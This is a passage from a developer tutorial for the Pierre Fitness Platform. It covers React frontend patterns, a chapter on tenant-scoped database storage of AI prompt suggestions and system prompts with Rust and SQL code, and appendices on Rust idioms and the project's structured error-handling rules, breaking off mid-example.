The frontend uses Pierre’s custom TailwindCSS theme:
/* Pierre brand colors */
.text-pierre-violet /* #6366F1 - Primary brand color */
.bg-pierre-gray-50 /* #F9FAFB - Background */
.text-pierre-gray-900 /* #111827 - Primary text */
.bg-pierre-activity /* #10B981 - Success/activity */
.text-pierre-performance /* #F59E0B - Warning/performance */
Component Patterns
Card pattern:
<div className="bg-white rounded-lg shadow p-6">
<h3 className="text-lg font-semibold text-pierre-gray-900">
Card Title
</h3>
<p className="text-sm text-pierre-gray-600 mt-2">
Card content
</p>
</div>
Button variants:
// Primary button
<button className="bg-pierre-violet text-white px-4 py-2 rounded-lg hover:bg-pierre-violet-dark">
Primary Action
</button>
// Secondary button
<button className="border border-pierre-gray-300 text-pierre-gray-700 px-4 py-2 rounded-lg hover:bg-pierre-gray-50">
Secondary Action
</button>
Loading states:
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-pierre-violet" />
Best Practices
1. Type Safety
Always define TypeScript interfaces:
interface ApiKey {
id: string;
name: string;
created_at: string;
expires_at?: string;
rate_limit_requests: number;
usage_count: number;
}
2. Error Handling
Use React Query’s error handling:
const { data, error, isError } = useQuery({ ... });
if (isError) {
return (
<div className="bg-red-50 text-red-700 p-4 rounded-lg">
Error: {error.message}
</div>
);
}
3. Loading States
Always show loading feedback:
if (isLoading) {
return (
<div className="flex items-center justify-center h-64">
<div className="animate-spin rounded-full h-12 w-12 border-b-2 border-pierre-violet" />
</div>
);
}
4. Query Invalidation
Invalidate queries after mutations:
const mutation = useMutation({
mutationFn: apiService.createApiKey,
onSuccess: () => {
queryClient.invalidateQueries({ queryKey: ['api-keys'] });
toast.success('API key created');
},
});
5. Accessibility
Include ARIA attributes and keyboard navigation:
<button
aria-label="Delete API key"
onClick={handleDelete}
className="focus:ring-2 focus:ring-pierre-violet focus:outline-none"
>
Delete
</button>
Troubleshooting
CORS Errors
The Vite dev server proxies API requests. If you see CORS errors:
- Ensure Pierre server is running on port 8081
- Check the `vite.config.ts` proxy configuration
Authentication Issues
Clear browser storage and re-authenticate:
localStorage.clear();
window.location.reload();
React Query Stale Data
Force refresh queries:
queryClient.invalidateQueries();
Key Takeaways
- React 19 + TypeScript: Modern React with full type safety.
- React Query: Server state management with automatic caching and refetching.
- Context providers: `AuthProvider` for auth, `WebSocketProvider` for real-time updates.
- API service: Centralized Axios client with interceptors for CSRF and auth.
- TailwindCSS: Utility-first styling with Pierre's custom theme.
- Testing pyramid: Unit (Vitest), E2E (Playwright, 282 tests), Integration.
- Component-based: 35+ components organized by feature.
- User flows: Registration → Pending → Approved → Active lifecycle.
- Admin features: Impersonation, user management, system settings.
- Real-time: WebSocket integration for live dashboard updates.
End of Tutorial
You’ve completed the comprehensive Pierre Fitness Platform tutorial! You now understand:
- Part I: Foundation (architecture, errors, config, DI)
- Part II: Authentication & Security (cryptography, JWT, multi-tenancy, middleware)
- Part III: MCP Protocol (JSON-RPC, request flow, transports, tool registry)
- Part IV: SDK & Type System (bridge architecture, type generation)
- Part V: OAuth, A2A & Providers (OAuth server/client, provider abstraction, A2A protocol)
- Part VI: Tools & Intelligence (47 tools, sports science algorithms, recovery, nutrition)
- Part VII: Testing & Deployment (synthetic data, design system, production deployment)
- SDK Development: TypeScript SDK with type generation pipeline
- Frontend Development: React dashboard with 35+ components
Next Steps:
- Review CLAUDE.md for code standards
- Explore the codebase using Appendix C as a map
- Run the test suite to see synthetic data in action
- Set up local development environment
- Contribute improvements or new features
Happy coding!
Chapter 34: Database System Prompts
This chapter covers Pierre’s database-backed prompt management system, which enables tenant-specific customization of AI chat suggestions, welcome messages, and system instructions.
Architecture Overview
┌─────────────────────────────────────────────────────────────────┐
│ Prompt Management System │
├─────────────────────────────────────────────────────────────────┤
│ │
│ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │
│ │ Prompt │ │ Welcome │ │ System │ │
│ │ Categories │ │ Prompt │ │ Prompt │ │
│ └──────┬───────┘ └──────┬───────┘ └──────┬───────┘ │
│ │ │ │ │
│ └───────────────────┼────────────────────┘ │
│ │ │
│ ┌───────▼───────┐ │
│ │ PromptManager │ │
│ │ (SQLite) │ │
│ └───────┬───────┘ │
│ │ │
│ ┌──────────────┼──────────────┐ │
│ │ │ │ │
│ ┌─────▼─────┐ ┌─────▼─────┐ ┌────▼─────┐ │
│ │ Tenant A │ │ Tenant B │ │ Tenant C │ │
│ │ Prompts │ │ Prompts │ │ Prompts │ │
│ └───────────┘ └───────────┘ └──────────┘ │
│ │
└─────────────────────────────────────────────────────────────────┘
Database Schema
Prompt Suggestions Table
Source: migrations/20250120000023_prompts_schema.sql
CREATE TABLE IF NOT EXISTS prompt_suggestions (
id TEXT PRIMARY KEY,
tenant_id TEXT NOT NULL REFERENCES tenants(id) ON DELETE CASCADE,
category_key TEXT NOT NULL,
category_title TEXT NOT NULL,
category_icon TEXT NOT NULL,
pillar TEXT NOT NULL CHECK (pillar IN ('activity', 'nutrition', 'recovery')),
prompts TEXT NOT NULL, -- JSON array of prompt strings
display_order INTEGER NOT NULL DEFAULT 0,
is_active INTEGER NOT NULL DEFAULT 1,
created_at TEXT NOT NULL,
updated_at TEXT NOT NULL,
UNIQUE(tenant_id, category_key)
);
CREATE INDEX IF NOT EXISTS idx_prompt_suggestions_tenant
ON prompt_suggestions(tenant_id);
CREATE INDEX IF NOT EXISTS idx_prompt_suggestions_active
ON prompt_suggestions(tenant_id, is_active);
CREATE INDEX IF NOT EXISTS idx_prompt_suggestions_order
ON prompt_suggestions(tenant_id, display_order);
Welcome Prompts Table
Source: migrations/20250120000023_prompts_schema.sql (same file)
CREATE TABLE IF NOT EXISTS welcome_prompts (
id TEXT PRIMARY KEY,
tenant_id TEXT NOT NULL UNIQUE REFERENCES tenants(id) ON DELETE CASCADE,
prompt_text TEXT NOT NULL,
is_active INTEGER NOT NULL DEFAULT 1,
created_at TEXT NOT NULL,
updated_at TEXT NOT NULL
);
CREATE INDEX IF NOT EXISTS idx_welcome_prompts_tenant
ON welcome_prompts(tenant_id);
System Prompts Table
Source: migrations/20250120000024_system_prompts_schema.sql
CREATE TABLE IF NOT EXISTS system_prompts (
id TEXT PRIMARY KEY,
tenant_id TEXT NOT NULL UNIQUE REFERENCES tenants(id) ON DELETE CASCADE,
prompt_text TEXT NOT NULL,
is_active INTEGER NOT NULL DEFAULT 1,
created_at TEXT NOT NULL,
updated_at TEXT NOT NULL
);
CREATE INDEX IF NOT EXISTS idx_system_prompts_tenant
ON system_prompts(tenant_id);
Pillar Classification
Pierre organizes prompts into three “pillars” that align with the fitness intelligence domains:
Source: src/database/prompts.rs:14-27
#![allow(unused)]
fn main() {
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "lowercase")]
pub enum Pillar {
/// Activity pillar (Emerald gradient)
Activity,
/// Nutrition pillar (Amber gradient)
Nutrition,
/// Recovery pillar (Indigo gradient)
Recovery,
}
}
Each pillar maps to a distinct visual style in the frontend:
| Pillar | Color Theme | Example Prompts |
|---|---|---|
| Activity | Emerald (#10B981) | “Am I ready for a hard workout?”, “What’s my predicted marathon time?” |
| Nutrition | Amber (#F59E0B) | “How many calories should I eat?”, “Create a high-protein meal” |
| Recovery | Indigo (#6366F1) | “Do I need a rest day?”, “Analyze my sleep quality” |
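The lowercase serde representation also matches what the database stores: the `PromptManager` listing later in this chapter binds `request.pillar.as_str()` when inserting rows, and the schema's CHECK constraint only accepts the three lowercase strings. A minimal, dependency-free sketch of the two conversions (the actual implementation in `src/database/prompts.rs` may differ in details such as the error type):

```rust
use std::str::FromStr;

#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Pillar {
    Activity,
    Nutrition,
    Recovery,
}

impl Pillar {
    /// Lowercase form stored in the `pillar` column (matches the CHECK constraint).
    pub const fn as_str(self) -> &'static str {
        match self {
            Self::Activity => "activity",
            Self::Nutrition => "nutrition",
            Self::Recovery => "recovery",
        }
    }
}

impl FromStr for Pillar {
    type Err = String;

    fn from_str(s: &str) -> Result<Self, Self::Err> {
        match s {
            "activity" => Ok(Self::Activity),
            "nutrition" => Ok(Self::Nutrition),
            "recovery" => Ok(Self::Recovery),
            other => Err(format!("unknown pillar: {other}")),
        }
    }
}
```

Round-tripping through these two functions keeps the Rust enum, the JSON representation, and the database column in agreement.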
Data Models
PromptCategory
Source: src/database/prompts.rs:31-52
#![allow(unused)]
fn main() {
pub struct PromptCategory {
pub id: Uuid,
pub tenant_id: String,
pub category_key: String, // Unique within tenant (e.g., "training")
pub category_title: String, // Display title (e.g., "Training")
pub category_icon: String, // Emoji icon (e.g., "runner")
pub pillar: Pillar, // Visual classification
pub prompts: Vec<String>, // List of prompt suggestions
pub display_order: i32, // Lower numbers shown first
pub is_active: bool, // Whether category is visible
}
}
WelcomePrompt
#![allow(unused)]
fn main() {
pub struct WelcomePrompt {
pub id: Uuid,
pub tenant_id: String,
pub prompt_text: String, // Shown to first-time users
pub is_active: bool,
}
}
SystemPrompt
#![allow(unused)]
fn main() {
pub struct SystemPrompt {
pub id: Uuid,
pub tenant_id: String,
pub prompt_text: String, // LLM system instructions (markdown)
pub is_active: bool,
}
}
Default Prompt Categories
Source: src/llm/prompts/prompt_categories.json
[
{
"key": "training",
"title": "Training",
"icon": "runner",
"pillar": "activity",
"prompts": [
"Am I ready for a hard workout today?",
"What's my predicted marathon time?"
]
},
{
"key": "nutrition",
"title": "Nutrition",
"icon": "salad",
"pillar": "nutrition",
"prompts": [
"How many calories should I eat today?",
"What should I eat before my morning run?"
]
},
{
"key": "recovery",
"title": "Recovery",
"icon": "sleep",
"pillar": "recovery",
"prompts": [
"Do I need a rest day?",
"Analyze my sleep quality"
]
},
{
"key": "recipes",
"title": "Recipes",
"icon": "cooking",
"pillar": "nutrition",
"prompts": [
"Create a high-protein post-workout meal",
"Show my saved recipes"
]
}
]
API Endpoints
Public Endpoints
| Method | Endpoint | Description |
|---|---|---|
| GET | /api/prompts/suggestions | Get active prompt categories and welcome message |
Response:
{
"categories": [
{
"category_key": "training",
"category_title": "Training",
"category_icon": "runner",
"pillar": "activity",
"prompts": ["Am I ready for a hard workout today?"]
}
],
"welcome_prompt": "Welcome to Pierre! I'm your fitness AI assistant.",
"metadata": {
"timestamp": "2025-01-07T12:00:00Z",
"api_version": "1.0"
}
}
Admin Endpoints
All admin endpoints require the admin or super_admin role.
| Method | Endpoint | Description |
|---|---|---|
| GET | /api/admin/prompts | List all categories (including inactive) |
| POST | /api/admin/prompts | Create new category |
| GET | /api/admin/prompts/:id | Get specific category |
| PUT | /api/admin/prompts/:id | Update category |
| DELETE | /api/admin/prompts/:id | Delete category |
| GET | /api/admin/prompts/welcome | Get welcome prompt |
| PUT | /api/admin/prompts/welcome | Update welcome prompt |
| GET | /api/admin/prompts/system | Get system prompt |
| PUT | /api/admin/prompts/system | Update system prompt |
| POST | /api/admin/prompts/reset | Reset to defaults |
Create Category Request
{
"category_key": "strength",
"category_title": "Strength Training",
"category_icon": "dumbbell",
"pillar": "activity",
"prompts": [
"What's my estimated 1RM for bench press?",
"Create a strength training plan"
],
"display_order": 5
}
Update Category Request
{
"category_title": "Strength & Power",
"prompts": [
"What's my estimated 1RM?",
"Create a power building program"
],
"is_active": true
}
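Note that the update request is partial: fields omitted from the JSON leave the stored values untouched. A hypothetical sketch of that merge logic, with `Option` fields meaning "leave unchanged" (the struct and function names here are illustrative, not taken from the codebase):

```rust
/// Illustrative subset of a stored category.
#[derive(Debug, Clone, PartialEq)]
struct Category {
    category_title: String,
    prompts: Vec<String>,
    is_active: bool,
}

/// Illustrative partial-update payload: `None` means "leave unchanged".
#[derive(Default)]
struct UpdateCategoryRequest {
    category_title: Option<String>,
    prompts: Option<Vec<String>>,
    is_active: Option<bool>,
}

/// Apply only the fields that were present in the request.
fn apply_update(current: &mut Category, req: UpdateCategoryRequest) {
    if let Some(title) = req.category_title {
        current.category_title = title;
    }
    if let Some(prompts) = req.prompts {
        current.prompts = prompts;
    }
    if let Some(active) = req.is_active {
        current.is_active = active;
    }
}
```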
PromptManager Implementation
Source: src/database/prompts.rs
The PromptManager handles all database operations with tenant isolation:
#![allow(unused)]
fn main() {
pub struct PromptManager {
pool: SqlitePool,
}
impl PromptManager {
pub fn new(pool: SqlitePool) -> Self {
Self { pool }
}
/// Get active prompt categories for a tenant
pub async fn get_prompt_suggestions(
&self,
tenant_id: &str,
) -> AppResult<Vec<PromptCategory>> {
let rows = sqlx::query(
r#"
SELECT id, tenant_id, category_key, category_title,
category_icon, pillar, prompts, display_order, is_active,
created_at, updated_at
FROM prompt_suggestions
WHERE tenant_id = ? AND is_active = 1
ORDER BY display_order ASC, category_title ASC
"#,
)
.bind(tenant_id)
.fetch_all(&self.pool)
.await?;
rows.into_iter().map(Self::row_to_category).collect()
}
/// Create a new prompt category
pub async fn create_prompt_category(
&self,
tenant_id: &str,
request: &CreatePromptCategoryRequest,
) -> AppResult<PromptCategory> {
let id = Uuid::new_v4();
let now = Utc::now().to_rfc3339();
let prompts_json = serde_json::to_string(&request.prompts)?;
sqlx::query(
r#"
INSERT INTO prompt_suggestions
(id, tenant_id, category_key, category_title, category_icon,
pillar, prompts, display_order, is_active, created_at, updated_at)
VALUES (?, ?, ?, ?, ?, ?, ?, ?, 1, ?, ?)
"#,
)
.bind(id.to_string())
.bind(tenant_id)
.bind(&request.category_key)
.bind(&request.category_title)
.bind(&request.category_icon)
.bind(request.pillar.as_str())
.bind(&prompts_json)
.bind(request.display_order.unwrap_or(0))
.bind(&now)
.bind(&now)
.execute(&self.pool)
.await?;
self.get_prompt_category(tenant_id, &id.to_string()).await
}
/// Reset prompts to defaults from JSON file
pub async fn reset_to_defaults(&self, tenant_id: &str) -> AppResult<()> {
// Delete existing categories
sqlx::query("DELETE FROM prompt_suggestions WHERE tenant_id = ?")
.bind(tenant_id)
.execute(&self.pool)
.await?;
// Load defaults from embedded JSON
let defaults: Vec<DefaultCategory> =
serde_json::from_str(include_str!("../llm/prompts/prompt_categories.json"))?;
// Insert default categories
for (order, cat) in defaults.into_iter().enumerate() {
let request = CreatePromptCategoryRequest {
category_key: cat.key,
category_title: cat.title,
category_icon: cat.icon,
pillar: Pillar::from_str(&cat.pillar)?,
prompts: cat.prompts,
display_order: Some(order as i32),
};
self.create_prompt_category(tenant_id, &request).await?;
}
// Reset welcome and system prompts
self.update_welcome_prompt(
tenant_id,
include_str!("../llm/prompts/welcome_prompt.md"),
).await?;
self.update_system_prompt(
tenant_id,
include_str!("../llm/prompts/pierre_system.md"),
).await?;
Ok(())
}
}
}
Tenant Isolation
Every prompt operation enforces tenant isolation:
- Query filtering: All SELECT queries include `WHERE tenant_id = ?`
- Ownership validation: Updates/deletes verify the category belongs to the tenant
- Unique constraints: `UNIQUE(tenant_id, category_key)` prevents duplicate keys
- Foreign key cascade: `ON DELETE CASCADE` cleans up when the tenant is deleted
#![allow(unused)]
fn main() {
/// Ensure the category belongs to the requesting tenant
async fn validate_category_ownership(
&self,
tenant_id: &str,
category_id: &str,
) -> AppResult<PromptCategory> {
let category = self.get_prompt_category_by_id(category_id).await?;
if category.tenant_id != tenant_id {
return Err(AppError::new(
ErrorCode::PermissionDenied,
"Category does not belong to this tenant",
));
}
Ok(category)
}
}
Frontend Admin UI
Source: frontend/src/components/PromptsAdminTab.tsx
The admin UI provides three sub-tabs:
Categories Tab
- Lists all prompt categories with pillar-colored badges
- Create, edit, and delete categories
- Drag-and-drop reordering (via `display_order`)
- Toggle category active/inactive state
Welcome Tab
- Edit the welcome message shown to new users
- Real-time preview with markdown rendering
- Character count indicator
System Tab
- Edit the LLM system prompt (markdown format)
- Customize AI assistant behavior and personality
- Reset to default system prompt
Reset Functionality
const resetMutation = useMutation({
mutationFn: () => apiService.resetPromptsToDefaults(),
onSuccess: () => {
// Invalidate all prompt-related queries
queryClient.invalidateQueries({ queryKey: ['admin-prompt-categories'] });
queryClient.invalidateQueries({ queryKey: ['admin-welcome-prompt'] });
queryClient.invalidateQueries({ queryKey: ['admin-system-prompt'] });
queryClient.invalidateQueries({ queryKey: ['prompt-suggestions'] });
},
});
Integration with Chat Interface
The chat interface fetches suggestions via the public endpoint:
Source: frontend/src/components/PromptSuggestions.tsx
const { data: suggestions } = useQuery({
queryKey: ['prompt-suggestions'],
queryFn: () => apiService.getPromptSuggestions(),
});
// Display categories grouped by pillar
const categoriesByPillar = useMemo(() => {
return suggestions?.categories.reduce((acc, cat) => {
const pillar = cat.pillar as Pillar;
if (!acc[pillar]) acc[pillar] = [];
acc[pillar].push(cat);
return acc;
}, {} as Record<Pillar, PromptCategory[]>);
}, [suggestions]);
Best Practices
1. Category Keys
Use descriptive, lowercase keys that won’t change:
- Good: `training`, `nutrition`, `recovery`, `recipes`
- Bad: `cat1`, `new_category`, `temp`
2. Prompt Writing
Write prompts as questions users would naturally ask:
- Good: “Am I ready for a hard workout today?”
- Bad: “Get workout readiness”
3. Pillar Assignment
Match pillars to the primary domain:
- Activity: Training, performance, workouts
- Nutrition: Diet, calories, recipes, hydration
- Recovery: Sleep, rest days, stress, HRV
4. Display Order
Use meaningful ordering:
- `0-9`: Primary/featured categories
- `10-19`: Secondary categories
- `20+`: Specialized/advanced categories
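The effective ordering is defined by the SQL in `get_prompt_suggestions` (`ORDER BY display_order ASC, category_title ASC`); any code that sorts categories locally should reproduce it. A minimal sketch of the same comparison in Rust, using `(display_order, title)` pairs as a stand-in for full category structs:

```rust
/// Sort (display_order, title) pairs the way the database query does:
/// ascending display_order, ties broken alphabetically by title.
fn sort_categories(categories: &mut [(i32, String)]) {
    categories.sort_by(|a, b| a.0.cmp(&b.0).then_with(|| a.1.cmp(&b.1)));
}
```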
Testing
Source: frontend/e2e/prompts.spec.ts
The prompt system includes 17 Playwright E2E tests:
test.describe('Prompts Admin', () => {
test('can view prompt categories', async ({ page }) => {
await page.goto('/');
await page.click('[data-testid="prompts-tab"]');
expect(await page.locator('[data-testid="category-card"]').count())
.toBeGreaterThan(0);
});
test('can create new category', async ({ page }) => {
await page.click('[data-testid="create-category-btn"]');
await page.fill('[data-testid="category-key"]', 'test-category');
await page.fill('[data-testid="category-title"]', 'Test Category');
await page.selectOption('[data-testid="pillar-select"]', 'activity');
await page.click('[data-testid="save-category-btn"]');
await expect(page.locator('text=Test Category')).toBeVisible();
});
test('can reset to defaults', async ({ page }) => {
await page.click('[data-testid="reset-defaults-btn"]');
await page.click('[data-testid="confirm-reset-btn"]');
await expect(page.locator('text=Training')).toBeVisible();
});
});
Key Takeaways
-
Three prompt types: Categories (suggestions), Welcome (first-time), System (LLM instructions)
-
Tenant isolation: Each tenant has independent prompt configurations
-
Pillar classification: Visual organization into Activity, Nutrition, Recovery
-
Admin-only management: CRUD operations require admin role
-
Reset to defaults: One-click restore from embedded JSON/markdown files
-
Real-time updates: React Query invalidation ensures UI stays current
-
Markdown support: System prompts support full markdown formatting
-
Default prompts: New tenants get pre-configured defaults automatically
Related Chapters:
- Chapter 7: Multi-Tenant Isolation (tenant security)
- Chapter 33: Frontend Development (admin tabs)
- Chapter 26: LLM Providers (system prompt usage)
Appendix A: Rust Idioms Reference
Quick reference for Rust idioms used throughout Pierre.
Error Handling
? operator: Propagate errors up the call stack.
#![allow(unused)]
fn main() {
let data = fetch_data()?; // Returns early if error
}
thiserror: Derive Error trait with formatted messages.
#![allow(unused)]
fn main() {
#[derive(Error, Debug)]
#[error("Database error: {0}")]
pub struct DbError(String);
}
Structured Error Types (REQUIRED)
CRITICAL: Pierre prohibits anyhow::anyhow!() macro in all production code. All errors MUST use structured error types.
Correct patterns:
#![allow(unused)]
fn main() {
// GOOD: Using structured error types
return Err(AppError::not_found(format!("User {user_id}")));
return Err(DatabaseError::ConnectionFailed { source: e.to_string() }.into());
// GOOD: Mapping external errors to structured types
external_lib_call().map_err(|e| AppError::internal(format!("API failed: {e}")))?;
// GOOD: Adding context to structured errors
database_operation().context("Failed to fetch user profile")?;
}
Prohibited patterns (ZERO TOLERANCE):
#![allow(unused)]
fn main() {
// ❌ FORBIDDEN: Using anyhow::anyhow!()
return Err(anyhow::anyhow!("User not found"));
// ❌ FORBIDDEN: In map_err closures
.map_err(|e| anyhow!("Failed: {e}"))?;
// ❌ FORBIDDEN: In ok_or_else
.ok_or_else(|| anyhow!("Not found"))?;
}
Why structured errors?
- Enable type-safe error handling and proper HTTP status code mapping
- Support better error messages, logging, and debugging
- Make error handling testable and maintainable
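To make the type-safety argument concrete, here is a minimal, dependency-free sketch of what a structured error type buys you. Pierre's actual `AppError` has more variants and constructor helpers, so treat the names and variants below as illustrative:

```rust
use std::fmt;

#[derive(Debug, PartialEq)]
enum AppError {
    NotFound(String),
    PermissionDenied(String),
    Internal(String),
}

impl AppError {
    /// Type-safe mapping to an HTTP status code -- a match the compiler
    /// checks for exhaustiveness, which a stringly-typed anyhow error
    /// cannot offer.
    fn status_code(&self) -> u16 {
        match self {
            Self::NotFound(_) => 404,
            Self::PermissionDenied(_) => 403,
            Self::Internal(_) => 500,
        }
    }
}

impl fmt::Display for AppError {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        match self {
            Self::NotFound(what) => write!(f, "{what} not found"),
            Self::PermissionDenied(msg) => write!(f, "permission denied: {msg}"),
            Self::Internal(msg) => write!(f, "internal error: {msg}"),
        }
    }
}

impl std::error::Error for AppError {}
```

Because the variants are data rather than formatted strings, handlers can branch on them, tests can assert on them, and the HTTP layer can map them to status codes without string matching.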
Option and Result Patterns
Option::is_some_and: Check Some and condition in one call.
#![allow(unused)]
fn main() {
token.expires_at.is_some_and(|exp| exp > Utc::now())
}
Result::map_or: Transform result or use default.
#![allow(unused)]
fn main() {
result.map_or(0, |val| val.len())
}
Ownership and Borrowing
Arc<T>: Shared ownership across threads.
#![allow(unused)]
fn main() {
let database = Arc::new(Database::new());
let db_clone = database.clone(); // Cheap reference count increment
}
Box<dyn Trait>: Heap-allocated trait objects.
#![allow(unused)]
fn main() {
let provider: Box<dyn FitnessProvider> = Box::new(StravaProvider::new());
}
Async Patterns
async_trait: Async methods in traits.
#![allow(unused)]
fn main() {
#[async_trait]
trait Provider {
async fn get_data(&self) -> Result<Data>;
}
}
HRTB for Deserialize: Higher-ranked trait bound.
#![allow(unused)]
fn main() {
where
T: for<'de> Deserialize<'de>,
}
Type Safety Patterns
Enum for algorithm selection:
#![allow(unused)]
fn main() {
enum Algorithm {
Method1 { param: u32 },
Method2,
}
}
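The payoff of selecting algorithms via an enum is exhaustive matching: adding a variant turns every dispatch site into a compile error until it is handled. A small runnable illustration (the names are generic, not from the Pierre codebase):

```rust
enum Algorithm {
    Method1 { param: u32 },
    Method2,
}

/// Dispatch on the selected algorithm. The match is exhaustive, so a new
/// variant added to `Algorithm` must be handled here before the code compiles.
fn run(alg: &Algorithm, input: u32) -> u32 {
    match alg {
        Algorithm::Method1 { param } => input * param,
        Algorithm::Method2 => input + 1,
    }
}
```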
#[must_use]: Compiler warning if return value ignored.
#![allow(unused)]
fn main() {
#[must_use]
pub fn calculate(&self) -> f64 { ... }
}
Memory Management
zeroize: Secure memory cleanup for secrets.
#![allow(unused)]
fn main() {
use zeroize::Zeroize;
secret.zeroize(); // Overwrite with zeros
}
LazyLock: Thread-safe lazy static initialization (Rust 1.80+, preferred).
#![allow(unused)]
fn main() {
use std::sync::LazyLock;
// Initialization function runs once on first access
static CONFIG: LazyLock<Config> = LazyLock::new(|| Config::load());
// Usage - always initialized
let cfg = &*CONFIG; // Deref to get &Config
}
OnceLock: Thread-safe one-time initialization with runtime values.
#![allow(unused)]
fn main() {
use std::sync::OnceLock;
// When you need to set the value dynamically at runtime
static RUNTIME_CONFIG: OnceLock<Config> = OnceLock::new();
fn initialize(config: Config) {
RUNTIME_CONFIG.get_or_init(|| config);
}
}
When to use which:
- `LazyLock`: Initialization is known at compile time (replaces `lazy_static!`)
- `OnceLock`: Initialization depends on runtime values or must be deferred
Memory Allocation Guidance
When to Use Each Smart Pointer
| Type | Heap? | Thread-Safe? | Use Case |
|---|---|---|---|
| `T` (owned) | No | N/A | Small, short-lived values |
| `Box<T>` | Yes | No | Large values, recursive types |
| `Rc<T>` | Yes | No | Single-thread shared ownership |
| `Arc<T>` | Yes | Yes | Multi-thread shared ownership |
| `Cow<'a, T>` | Maybe | No | Clone-on-write optimization |
Stack vs Heap Guidelines
Prefer stack allocation:
#![allow(unused)]
fn main() {
// GOOD: Small structs on stack
let point = Point { x: 1.0, y: 2.0 }; // 16 bytes on stack
// GOOD: Arrays of known size
let buffer: [u8; 1024] = [0; 1024]; // 1KB on stack
}
Use heap for:
#![allow(unused)]
fn main() {
// Large data - avoid stack overflow
let large: Box<[u8; 1_000_000]> = Box::new([0; 1_000_000]);
// Dynamic size
let activities: Vec<Activity> = fetch_activities().await?;
// Trait objects (unknown size at compile time)
let provider: Box<dyn FitnessProvider> = get_provider();
// Recursive types
enum LinkedList {
Node(i32, Box<LinkedList>),
Nil,
}
}
Avoiding Unnecessary Allocations
Use slices instead of vectors:
#![allow(unused)]
fn main() {
// BAD: Allocates new Vec
fn process(data: Vec<u8>) { ... }
// GOOD: Borrows existing data
fn process(data: &[u8]) { ... }
}
Use &str for string parameters:
#![allow(unused)]
fn main() {
// BAD: Requires allocation or move
fn greet(name: String) { ... }
// GOOD: Accepts &str, &String, or String
fn greet(name: &str) { ... }
// BEST: Generic, accepts anything string-like
fn greet(name: impl AsRef<str>) { ... }
}
Clone-on-write for conditional ownership:
#![allow(unused)]
fn main() {
use std::borrow::Cow;
fn process_name(name: Cow<'_, str>) -> Cow<'_, str> {
if name.contains(' ') {
// Only allocates if modification needed
Cow::Owned(name.replace(' ', "_"))
} else {
name // No allocation
}
}
}
Activity Stream Processing
For large data streams (GPS, power, heart rate):
#![allow(unused)]
fn main() {
use std::collections::VecDeque;
// BAD: Loads entire stream into memory
let stream: Vec<f64> = activity.power_stream.clone();
let np = calculate_np(&stream);
// GOOD: Process in chunks with iterator
fn calculate_np_streaming<I>(stream: I, window: usize) -> f64
where
    I: Iterator<Item = f64>,
{
    // Uses fixed-size window buffer, O(window) space
    let mut window_buf = VecDeque::with_capacity(window);
    let (mut sum, mut fourth_sum, mut windows) = (0.0, 0.0, 0u64);
    for sample in stream {
        window_buf.push_back(sample);
        sum += sample;
        if window_buf.len() > window {
            sum -= window_buf.pop_front().unwrap_or(0.0);
        }
        if window_buf.len() == window {
            // Fourth-power mean of the rolling average (Normalized Power)
            fourth_sum += (sum / window as f64).powi(4);
            windows += 1;
        }
    }
    if windows == 0 { 0.0 } else { (fourth_sum / windows as f64).powf(0.25) }
}
}
Reducing Clone Usage
#![allow(unused)]
fn main() {
// BAD: Unnecessary clone
let name = user.name.clone();
println!("{}", name);
// GOOD: Borrow instead
println!("{}", &user.name);
// When clone is necessary, document why
let name = user.name.clone(); // Needed: ownership moves to async task
tokio::spawn(async move {
process(name).await;
});
}
Arc vs Clone for Shared State
// GOOD: Arc cloning is cheap (atomic counter increment)
let db = Arc::new(Database::new());
let db_clone = db.clone(); // ~2 CPU instructions

// BAD: Cloning large data
let activities = expensive_query().await?;
let activities_clone = activities.clone(); // Allocates!

// GOOD: Share via Arc if needed in multiple places
let activities = Arc::new(expensive_query().await?);
let activities_ref = activities.clone(); // Cheap
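The same ownership mechanics shown with std::thread (illustrative; Pierre uses tokio tasks, but the Arc behavior is identical): four threads read one shared allocation through cheap Arc clones instead of four copies of the data.

```rust
use std::sync::Arc;
use std::thread;

fn main() {
    // One 10,000-element allocation, shared rather than copied.
    let activities = Arc::new(vec![1.0_f64; 10_000]);
    let mut handles = Vec::new();
    for _ in 0..4 {
        let shared = Arc::clone(&activities); // cheap: atomic refcount bump
        handles.push(thread::spawn(move || shared.iter().sum::<f64>()));
    }
    for handle in handles {
        // Every thread sees the same underlying data.
        assert!((handle.join().unwrap() - 10_000.0).abs() < f64::EPSILON);
    }
}
```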
Key Takeaways
- Error propagation: Use the ? operator for clean error handling.
- Structured errors: anyhow!() is forbidden in production code; use the AppError, DatabaseError, and ProviderError enums.
- Trait objects: Arc<dyn Trait> for shared polymorphism.
- Async traits: The #[async_trait] macro enables async methods in traits.
- Type safety: Enums and #[must_use] prevent common mistakes.
- Secure memory: The zeroize crate for cryptographic key cleanup.
- Lazy statics: Use std::sync::LazyLock (Rust 1.80+) for compile-time-known lazy initialization, OnceLock for runtime values.
Appendix B: CLAUDE.md Compliance Reference
Comprehensive reference for Pierre codebase standards from .claude/CLAUDE.md.
Error Handling (Zero Tolerance)
Structured Error Types (REQUIRED)
All errors MUST use project-specific error enums:
// ✅ GOOD: Structured error types
return Err(AppError::not_found(format!("User {user_id}")));

return Err(DatabaseError::ConnectionFailed { source: e.to_string() }.into());

return Err(ProviderError::RateLimitExceeded {
    provider: "Strava".to_string(),
    retry_after_secs: 3600,
    limit_type: "Daily quota".to_string(),
});

// ✅ GOOD: Mapping external errors
external_lib_call().map_err(|e| AppError::internal(format!("API failed: {e}")))?;
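For orientation, a dependency-free sketch of what such a structured variant looks like under the hood. The real Pierre enums derive their Display impls via thiserror; the hand-rolled impl and message wording here are assumptions, with field names taken from the example above:

```rust
use std::fmt;

// Hedged sketch: hand-rolled Display instead of thiserror, same structured shape.
#[derive(Debug)]
enum ProviderError {
    RateLimitExceeded {
        provider: String,
        retry_after_secs: u64,
        limit_type: String,
    },
}

impl fmt::Display for ProviderError {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        match self {
            Self::RateLimitExceeded { provider, retry_after_secs, limit_type } => write!(
                f,
                "{provider} rate limit exceeded ({limit_type}); retry after {retry_after_secs}s"
            ),
        }
    }
}

fn main() {
    let err = ProviderError::RateLimitExceeded {
        provider: "Strava".to_string(),
        retry_after_secs: 3600,
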